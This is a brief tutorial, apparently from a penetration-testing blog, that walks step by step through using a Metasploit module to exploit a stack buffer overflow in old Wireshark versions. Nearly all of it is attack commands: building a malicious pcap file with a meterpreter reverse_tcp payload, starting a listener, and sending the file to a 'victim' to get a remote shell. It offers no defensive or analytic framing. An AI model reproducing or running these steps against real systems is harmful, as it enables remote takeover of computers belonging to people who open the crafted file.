Categories

Archives

Kali Linux, Penetration Testing

Hack Remote PC using Wireshark wiretap/mpeg.c Stack Buffer Overflow

This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.)

Exploit Targets

Wireshark <= 1.8.12/1.10.5

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/wireshark_mpeg_overflow

msf exploit (wireshark_mpeg_overflow)>set payload windows/meterpreter/reverse_tcp

msf exploit (wireshark_mpeg_overflow)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (wireshark_mpeg_overflow)>set target 1

msf exploit (wireshark_mpeg_overflow)>exploit

After we successfully generate the malicious pcap File, it will stored on your local computer

/root/.msf4/local/mpeg_overflow.pcap

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7

exploit

Now send your mpeg_overflow.pcap files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer